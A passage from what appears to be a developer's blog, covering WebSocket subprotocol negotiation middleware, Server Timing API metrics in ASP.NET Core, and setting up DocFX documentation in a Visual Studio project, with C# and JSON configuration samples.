    public WebSocketConnectionsMiddleware(RequestDelegate next,
        IWebSocketConnectionsService connectionsService)
    {
        _defaultSubProtocol = new PlainTextWebSocketSubprotocol();
        _supportedSubProtocols = new List<ITextWebSocketSubprotocol>
        {
            new JsonWebSocketSubprotocol(),
            _defaultSubProtocol
        };
        _connectionsService = connectionsService ??
            throw new ArgumentNullException(nameof(connectionsService));
    }

    public async Task Invoke(HttpContext context)
    {
        if (context.WebSockets.IsWebSocketRequest)
        {
            ITextWebSocketSubprotocol subProtocol =
                NegotiateSubProtocol(context.WebSockets.WebSocketRequestedProtocols);

            WebSocket webSocket =
                await context.WebSockets.AcceptWebSocketAsync(subProtocol?.SubProtocol);

            WebSocketConnection webSocketConnection =
                new WebSocketConnection(webSocket, subProtocol ?? _defaultSubProtocol);

            ...
        }
        else
        {
            context.Response.StatusCode = 400;
        }
    }

    private ITextWebSocketSubprotocol NegotiateSubProtocol(IList<string> requestedSubProtocols)
    {
        ITextWebSocketSubprotocol subProtocol = null;

        foreach (ITextWebSocketSubprotocol supportedSubProtocol in _supportedSubProtocols)
        {
            if (requestedSubProtocols.Contains(supportedSubProtocol.SubProtocol))
            {
                subProtocol = supportedSubProtocol;
                break;
            }
        }

        return subProtocol;
    }
}

With this implementation all the existing clients which don't support the new subprotocol will continue to work without any changes: they will not advertise any subprotocols and the server will use the default one without providing a name as part of the handshake. Meanwhile our application, which advertises support for the new subprotocol, will use it because it is the one preferred by the server.

It is also worth mentioning that subprotocols are not meant only for internal purposes. There is a number of well-known subprotocols, a registry of which is available here.

The demo project is available on GitHub, it should be a good starting point for playing with WebSocket subprotocol negotiation.

There is a number of Web APIs which allow measuring the performance of web applications, with Navigation Timing, Resource Timing and User Timing among them.

The youngest member of the family is the Server Timing API, which allows communicating server-side performance metrics to the client. The API is not widely supported yet, but Chrome DevTools is able to interpret the information sent from the server and expose it as part of the request timing information. Let's see how this feature can be utilized from ASP.NET Core.

Basics of Server Timing API

The Server Timing definition of a metric can be represented by the following structure.

public struct ServerTimingMetric
{
    private string _serverTimingMetric;

    public string Name { get; }

    public decimal? Value { get; }

    public string Description { get; }

    public ServerTimingMetric(string name, decimal? value, string description)
    {
        if (String.IsNullOrEmpty(name))
            throw new ArgumentNullException(nameof(name));

        Name = name;
        Value = value;
        Description = description;

        _serverTimingMetric = null;
    }

    public override string ToString()
    {
        if (_serverTimingMetric == null)
        {
            _serverTimingMetric = Name;

            if (Value.HasValue)
                _serverTimingMetric = _serverTimingMetric + "=" + Value.Value.ToString(CultureInfo.InvariantCulture);

            if (!String.IsNullOrEmpty(Description))
                _serverTimingMetric = _serverTimingMetric + ";\"" + Description + "\"";
        }

        return _serverTimingMetric;
    }
}

The only required property is the name, which means that a metric can be used to indicate that something has happened without any related duration information.

The metrics are delivered to the client through the Server-Timing response header. The header may occur multiple times in the response, which means that multiple metrics can be delivered through multiple headers or as a single comma-separated list (or a combination of both). A class representing the header value could look like the one below.

public class ServerTimingHeaderValue
{
    public ICollection<ServerTimingMetric> Metrics { get; }

    public ServerTimingHeaderValue()
    {
        Metrics = new List<ServerTimingMetric>();
    }

    public override string ToString()
    {
        return String.Join(",", Metrics);
    }
}
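With the ToString implementations above, a response carrying the metrics used later in this post would include a header like this:

Server-Timing: cache=300;"Cache",sql=900;"Sql Server",fs=600;"FileSystem",cpu=1230;"Total CPU"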

Knowing how to construct the header, we can try to feed Chrome DevTools with some information. First we can write an extension method which will simplify adding the header to the response.

public static class HttpResponseHeadersExtensions
{
    public static void SetServerTiming(this HttpResponse response, params ServerTimingMetric[] metrics)
    {
        ServerTimingHeaderValue serverTiming = new ServerTimingHeaderValue();

        foreach (ServerTimingMetric metric in metrics)
        {
            serverTiming.Metrics.Add(metric);
        }

        response.Headers.Append("Server-Timing", serverTiming.ToString());
    }
}

Now we can create an empty web application and use the extension method for setting some metrics.

public class Startup
{
    ...

    public void Configure(IApplicationBuilder app)
    {
        ...

        app.Run(async (context) =>
        {
            context.Response.SetServerTiming(
                new ServerTimingMetric("cache", 300, "Cache"),
                new ServerTimingMetric("sql", 900, "Sql Server"),
                new ServerTimingMetric("fs", 600, "FileSystem"),
                new ServerTimingMetric("cpu", 1230, "Total CPU")
            );

            await context.Response.WriteAsync("-- Demo.AspNetCore.ServerTiming --");
        });
    }
}

After hitting F5 and navigating to the demo application in Chrome, the metrics should be visible in Chrome DevTools.

Chrome Network Tab - Server Timing

Making it more usable

The above demo shows that the Server Timing API works, but from a developer perspective we would want an easy way of providing metrics from different places in the application. In the case of ASP.NET Core this usually means a middleware and a service.

The service can be quite simple; it just needs to expose the collection of metrics.

public interface IServerTiming
{
    ICollection<ServerTimingMetric> Metrics { get; }
}

internal class ServerTiming : IServerTiming
{
    public ICollection<ServerTimingMetric> Metrics { get; }

    public ServerTiming()
    {
        Metrics = new List<ServerTimingMetric>();
    }
}

The important part is that metrics need to be collected per request. This can be achieved by properly scoping the service at registration.

public static class ServerTimingServiceCollectionExtensions
{
    public static IServiceCollection AddServerTiming(this IServiceCollection services)
    {
        services.AddScoped<IServerTiming, ServerTiming>();

        return services;
    }
}

The missing part is the middleware which will set the Server-Timing header with the metrics gathered by the service. The tricky part is that the header value should be set as late as possible (so there is a chance for other components in the pipeline to provide metrics). Setting the header value before invoking the next step in the pipeline would usually be too early, while trying to do so after that might result in an error as the headers could have already been sent to the client. The solution to this challenge is the HttpResponse.OnStarting method, which allows registering a delegate that will be invoked just before the response headers are sent.

public class ServerTimingMiddleware
{
    private readonly RequestDelegate _next;

    private static Task _completedTask = Task.FromResult<object>(null);

    public ServerTimingMiddleware(RequestDelegate next)
    {
        _next = next ?? throw new ArgumentNullException(nameof(next));
    }

    public Task Invoke(HttpContext context)
    {
        HandleServerTiming(context);

        return _next(context);
    }

    private void HandleServerTiming(HttpContext context)
    {
        context.Response.OnStarting(() => {
            IServerTiming serverTiming = context.RequestServices.GetRequiredService<IServerTiming>();

            if (serverTiming.Metrics.Count > 0)
            {
                context.Response.SetServerTiming(serverTiming.Metrics.ToArray());
            }

            return _completedTask;
        });
    }
}

Below is the same demo as previously, but based on the middleware and the service. The result is exactly the same, but now the service is accessible through DI which allows for easy gathering of metrics.

public class Startup
{
    public void ConfigureServices(IServiceCollection services)
    {
        services.AddServerTiming();
    }

    public void Configure(IApplicationBuilder app)
    {
        ...

        app.UseServerTiming()
            .Run(async (context) =>
            {
                IServerTiming serverTiming = context.RequestServices
                    .GetRequiredService<IServerTiming>();

                serverTiming.Metrics.Add(new ServerTimingMetric("cache", 300, "Cache"));
                serverTiming.Metrics.Add(new ServerTimingMetric("sql", 900, "Sql Server"));
                serverTiming.Metrics.Add(new ServerTimingMetric("fs", 600, "FileSystem"));
                serverTiming.Metrics.Add(new ServerTimingMetric("cpu", 1230, "Total CPU"));

                await context.Response.WriteAsync("-- Demo.AspNetCore.ServerTiming --");
            });
    }
}

It is important to remember that it is the server that is in full control of which metrics are communicated to the client and when, which may mean that the middleware (or metrics gathering) should be used conditionally.
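For example (a sketch assuming we only want to expose the metrics in the development environment), the registration could be made conditional:

public void Configure(IApplicationBuilder app, IHostingEnvironment env)
{
    if (env.IsDevelopment())
    {
        // Expose Server-Timing metrics only where the timing details can't leak to end users.
        app.UseServerTiming();
    }

    ...
}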

I've made all the classes mentioned here (and some more) available on GitHub and NuGet, ready to use.

I have a couple of small open source projects out there. For me the hardest part of getting such a project into a state which allows others to use it effectively is creating documentation - I only have enough discipline to put triple-slash comments on the public API. In the past I've been using Sandcastle Help File Builder to create help files based on those, but it has slowly started to feel heavy and outdated. So when Microsoft announced the move of the .NET Framework docs to docs.microsoft.com with the information that it is powered by DocFX, I decided this is what I want to try the next time I have to set up documentation for a project. Also, based on my previous experience, I've set some requirements:

  • The documentation needs to be part of the Visual Studio solution.
  • The documentation should be generated on build.
  • The documentation should be previewable from Visual Studio.

When Lib.AspNetCore.Mvc.JqGrid reached v1.0.0 I got the opportunity to try to achieve this.

Dedicated project for documentation

I wanted to keep the documentation as part of the solution, but at the same time I didn't want it to pollute the existing projects. Creating a separate project just for the documentation seemed like a good idea; I just needed to decide on the type of project. DocFx generates the documentation as a website, so a web application project felt natural. It also helped to address the "previewable from Visual Studio" requirement. The built-in preview functionality of DocFx requires going to the command line (yes, I could try to address that with the PostcompileScript target); with a web application project all I need is the F5 key. I've created an empty ASP.NET Core Web Application and enabled static files support.

public class Startup
{
    ...

    public void Configure(IApplicationBuilder app)
    {
        app.UseDefaultFiles()
            .UseStaticFiles();
    }
}

Setting up DocFx

DocFx for Visual Studio is available in the form of the docfx.console package. The moment you install the package it will attempt to generate documentation when the project is being built. This means that the build will start failing because the docfx.json file is missing. After consulting the DocFX User Manual I came up with the following file:

{
  "metadata": [
    {
      "src": [
        {
          "files": [
            "Lib.AspNetCore.Mvc.JqGrid.Infrastructure/Lib.AspNetCore.Mvc.JqGrid.Infrastructure.csproj",
            "Lib.AspNetCore.Mvc.JqGrid.Core/Lib.AspNetCore.Mvc.JqGrid.Core.csproj",
            "Lib.AspNetCore.Mvc.JqGrid.DataAnnotations/Lib.AspNetCore.Mvc.JqGrid.DataAnnotations.csproj",
            "Lib.AspNetCore.Mvc.JqGrid.Helper/Lib.AspNetCore.Mvc.JqGrid.Helper.csproj"
          ],
          "exclude": [ "**/bin/**", "**/obj/**" ],
          "src": ".."
        }
      ],
      "dest": "api"
    }
  ],
  "build": {
    "content": [
      {
        "files": [ "api/*.yml" ]
      }
    ],
    "dest": "wwwroot"
  }
}

The metadata section tells DocFx what it should use for generating the API documentation. The src property inside the src section allows for setting the base folder for the files property, while the files property should point to the projects which will be used for generation. The dest property defines the output folder for the metadata generation process. This is not the documentation yet. The actual documentation is created in the second step, which is configured through the build section. The content property tells DocFx what to use for the website. Here we should point to the output of the previous step and any other documents we want to include. The dest property is where the final website will be available - as this is in the context of a web application I've targeted wwwroot.

Building the documentation project resulted in disappointment in the form of "Cache is not valid" and "No metadata is generated" errors. What's worse, the problem was not easy to diagnose as those errors are reported for a number of different issues. After spending a considerable amount of time looking for my specific issue I stumbled upon the DocFx v2.16 release notes which introduced a new TargetFramework property for handling projects which use TargetFrameworks in the csproj. That was exactly my case. The release notes described how to handle complex scenarios (where documentation should be different depending on the TargetFramework) but mine was simple, so I just needed to add the property with one of the values from the csproj.

{
  "metadata": [
    {
      ...
      "properties": {
        "TargetFramework": "netstandard1.6"
      }
    }
  ],
  ...
}

This resulted in a successful build and filled up wwwroot/api with HTML files.

Adding minimum static content

The documentation is not quite usable yet. It's missing a landing page and a top-level Table of Contents. The Table of Contents can be handled by adding toc.yml or toc.md to the content; DocFx will render it as the top navigation bar. I've decided to go with the Markdown option.

# [Introduction](index.md)

# [API Reference](/api/Lib.AspNetCore.Mvc.JqGrid.Helper.html)

As you can guess, index.md is the landing page; it should also be added to the content.

{
  ...
  "build": {
    "content": [
      {
        "files": [
          "api/*.yml",
          "index.md",
          "toc.md"
        ]
      }
    ],
    ...
  }
}

Adjusting metadata

The last touch is adjusting some metadata values like the title, footer, favicon, logo, etc. The favicon and logo require some special handling as they contain paths to resources. In order for a resource to be accessible by DocFx it has to be added to the dedicated resource section inside build.

{
  ...
  "build": {
    ...
    "resource": [
      {
        "files": [
          "resources/svg/logo.svg",
          "resources/ico/favicon.ico"
        ]
      }
    ],
    ...
    "globalMetadata": {
      "_appTitle": "Lib.AspNetCore.Mvc.JqGrid",
      "_appFooter": "Copyright © 2016 - 2017 Tomasz Pęczek",
      "_appLogoPath": "resources/svg/logo.svg",
      "_appFaviconPath": "resources/ico/favicon.ico",
      "_disableBreadcrumb": true,
      "_disableAffix": true,
      "_disableContribution": true
    }
  }
}

This has satisfied my initial requirements. Further static content can be added exactly the same way index.md has been added, while the look and feel can be customized with templates.
